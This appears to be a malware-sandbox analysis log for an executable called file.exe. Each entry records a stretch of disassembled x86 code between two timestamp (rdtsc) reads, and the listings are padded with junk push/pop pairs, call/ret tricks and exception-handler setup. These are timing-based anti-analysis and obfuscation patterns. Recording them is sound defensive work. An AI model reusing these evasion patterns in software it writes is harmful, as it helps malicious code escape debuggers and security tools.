Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9BE4F second address: D9BE5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9BE5A second address: D9BE60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9D2E1 second address: D9D2FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB77110B476h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9C57C second address: D9C582 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9E494 second address: D9E498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9C673 second address: D9C677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9C677 second address: D9C689 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jnl 00007FB77110B466h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9F4AB second address: D9F4B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9F4B1 second address: D9F4B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9F4B5 second address: D9F54B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FB770CC1308h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 push 00000000h 0x00000027 pushad 0x00000028 jmp 00007FB770CC1313h 0x0000002d pushad 0x0000002e mov dword ptr [ebp+1247DE52h], edx 0x00000034 xor dword ptr [ebp+122D187Dh], edx 0x0000003a popad 0x0000003b popad 0x0000003c push 00000000h 0x0000003e mov edi, dword ptr [ebp+122D38EEh] 0x00000044 xchg eax, esi 0x00000045 push edi 0x00000046 pushad 0x00000047 jg 00007FB770CC1306h 0x0000004d jmp 00007FB770CC1318h 0x00000052 popad 0x00000053 pop edi 0x00000054 push eax 0x00000055 pushad 0x00000056 push eax 0x00000057 jmp 00007FB770CC130Fh 0x0000005c pop eax 0x0000005d push ebx 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA1CC2 second address: DA1CC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA2E40 second address: DA2E4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FB770CC1306h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA3F9F second address: DA3FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA4EAA second address: DA4EF0 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB770CC1306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b movzx ebx, dx 0x0000000e sub bh, 00000048h 0x00000011 push 00000000h 0x00000013 mov ebx, dword ptr [ebp+122D2981h] 0x00000019 push 00000000h 0x0000001b jnl 00007FB770CC1309h 0x00000021 movzx edi, si 0x00000024 xchg eax, esi 0x00000025 push esi 0x00000026 jng 00007FB770CC1318h 0x0000002c pop esi 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push esi 0x00000031 push eax 0x00000032 pop eax 0x00000033 pop esi 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA3FA3 second address: DA3FBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB77110B46Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007FB77110B46Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA2F45 second address: DA2F49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA2F49 second address: DA2F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 js 00007FB77110B46Ch 0x0000000f jne 00007FB77110B466h 0x00000015 pushad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA50FA second address: DA5114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB770CC130Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA6D6C second address: DA6D76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA8C58 second address: DA8C5D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4595D second address: D45963 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAB39C second address: DAB3A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAB3A0 second address: DAB3A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAB3A4 second address: DAB3AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAB3AA second address: DAB3B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAB3B0 second address: DAB3B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA9417 second address: DA9440 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jc 00007FB77110B48Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB77110B479h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA9440 second address: DA94F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB770CC130Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a and bx, CB21h 0x0000000f push dword ptr fs:[00000000h] 0x00000016 jmp 00007FB770CC1317h 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 push 00000000h 0x00000024 push ecx 0x00000025 call 00007FB770CC1308h 0x0000002a pop ecx 0x0000002b mov dword ptr [esp+04h], ecx 0x0000002f add dword ptr [esp+04h], 0000001Dh 0x00000037 inc ecx 0x00000038 push ecx 0x00000039 ret 0x0000003a pop ecx 0x0000003b ret 0x0000003c movzx ebx, ax 0x0000003f mov eax, dword ptr [ebp+122D11FDh] 0x00000045 jmp 00007FB770CC130Fh 0x0000004a mov ebx, dword ptr [ebp+122D1C23h] 0x00000050 push FFFFFFFFh 0x00000052 push 00000000h 0x00000054 push edi 0x00000055 call 00007FB770CC1308h 0x0000005a pop edi 0x0000005b mov dword ptr [esp+04h], edi 0x0000005f add dword ptr [esp+04h], 00000015h 0x00000067 inc edi 0x00000068 push edi 0x00000069 ret 0x0000006a pop edi 0x0000006b ret 0x0000006c push eax 0x0000006d pushad 0x0000006e jo 00007FB770CC1308h 0x00000074 pushad 0x00000075 popad 0x00000076 push eax 0x00000077 push edx 0x00000078 jmp 00007FB770CC130Dh 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA5F70 second address: DA5FDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 clc 0x0000000a push dword ptr fs:[00000000h] 0x00000011 call 00007FB77110B476h 0x00000016 pop ebx 0x00000017 mov dword ptr fs:[00000000h], esp 0x0000001e mov ebx, dword ptr [ebp+122D1863h] 0x00000024 mov eax, dword ptr [ebp+122D0079h] 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007FB77110B468h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 00000014h 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 sub bx, 62AEh 0x00000049 push FFFFFFFFh 0x0000004b mov ebx, dword ptr [ebp+122D2C4Dh] 0x00000051 nop 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA5FDB second address: DA5FE5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB770CC1306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA5FE5 second address: DA5FEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FB77110B466h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA5FEF second address: DA6001 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jns 00007FB770CC130Eh 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAB64D second address: DAB651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAB651 second address: DAB655 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAC639 second address: DAC63D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAC63D second address: DAC647 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB770CC1306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAE67A second address: DAE69C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FB77110B477h 0x0000000b jmp 00007FB77110B471h 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB0D90 second address: DB0D95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAE7DA second address: DAE7DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAE7DE second address: DAE802 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FB770CC1317h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAE802 second address: DAE868 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB77110B46Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov ebx, esi 0x0000000d push dword ptr fs:[00000000h] 0x00000014 sub dword ptr [ebp+12454CECh], edx 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 mov ebx, dword ptr [ebp+122D2B21h] 0x00000027 mov eax, dword ptr [ebp+122D1731h] 0x0000002d push 00000000h 0x0000002f push edx 0x00000030 call 00007FB77110B468h 0x00000035 pop edx 0x00000036 mov dword ptr [esp+04h], edx 0x0000003a add dword ptr [esp+04h], 0000001Bh 0x00000042 inc edx 0x00000043 push edx 0x00000044 ret 0x00000045 pop edx 0x00000046 ret 0x00000047 mov edi, ecx 0x00000049 push FFFFFFFFh 0x0000004b mov dword ptr [ebp+122D1A05h], esi 0x00000051 nop 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAE868 second address: DAE86E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAE86E second address: DAE873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB65CA second address: DB65CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB65CE second address: DB65DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB77110B466h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB65DA second address: DB65E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB65E0 second address: DB65E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB65E6 second address: DB6600 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FB770CC1311h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB6600 second address: DB6622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FB77110B474h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB6622 second address: DB663B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB770CC130Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007FB770CC1306h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB68C8 second address: DB68E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 jl 00007FB77110B481h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB77110B473h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB6A65 second address: DB6A6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB6A6A second address: DB6A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB6A70 second address: DB6AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007FB770CC1306h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 je 00007FB770CC131Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 push edi 0x00000019 pop edi 0x0000001a push esi 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB861E second address: DB8622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB8622 second address: DB8626 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB8626 second address: DB863B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB77110B46Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB863B second address: DB8664 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB770CC1319h 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FB770CC1306h 0x0000000f jo 00007FB770CC1306h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB8664 second address: DB8679 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB77110B471h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4C262 second address: D4C2A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007FB770CC1306h 0x0000000c popad 0x0000000d push ecx 0x0000000e jne 00007FB770CC1306h 0x00000014 pop ecx 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007FB770CC130Ch 0x0000001c pushad 0x0000001d jns 00007FB770CC1306h 0x00000023 push esi 0x00000024 pop esi 0x00000025 jmp 00007FB770CC130Eh 0x0000002a popad 0x0000002b jg 00007FB770CC130Ch 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBF7B6 second address: DBF7C0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB77110B466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC4A9B second address: DC4AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC4AA1 second address: DC4AA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC4AA7 second address: DC4AF4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FB770CC130Dh 0x00000008 jmp 00007FB770CC1316h 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007FB770CC1316h 0x00000018 push esi 0x00000019 pop esi 0x0000001a jns 00007FB770CC1306h 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D408CB second address: D408E7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB77110B466h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB77110B46Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC380F second address: DC382B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FB770CC130Dh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FB770CC1306h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC3CF8 second address: DC3CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC3CFE second address: DC3D1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB770CC1313h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC3D1D second address: DC3D21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC3D21 second address: DC3D27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC3D27 second address: DC3D2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC3EE2 second address: DC3EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC402D second address: DC4031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC4031 second address: DC403B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB770CC1306h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC417E second address: DC4184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC4184 second address: DC41AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB770CC1312h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FB770CC1312h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC41AC second address: DC41B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC41B3 second address: DC41B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC47A2 second address: DC47A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC4917 second address: DC4920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC4920 second address: DC492A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB77110B466h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCBE7E second address: DCBEA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB770CC1310h 0x00000007 jmp 00007FB770CC1310h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCBEA2 second address: DCBEA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCC442 second address: DCC446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCBB5C second address: DCBB6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB77110B46Bh 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCC9BF second address: DCC9CB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB770CC1306h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCC9CB second address: DCC9E1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jne 00007FB77110B466h 0x00000009 jl 00007FB77110B466h 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCC9E1 second address: DCC9FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB770CC1317h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCC9FC second address: DCCA09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
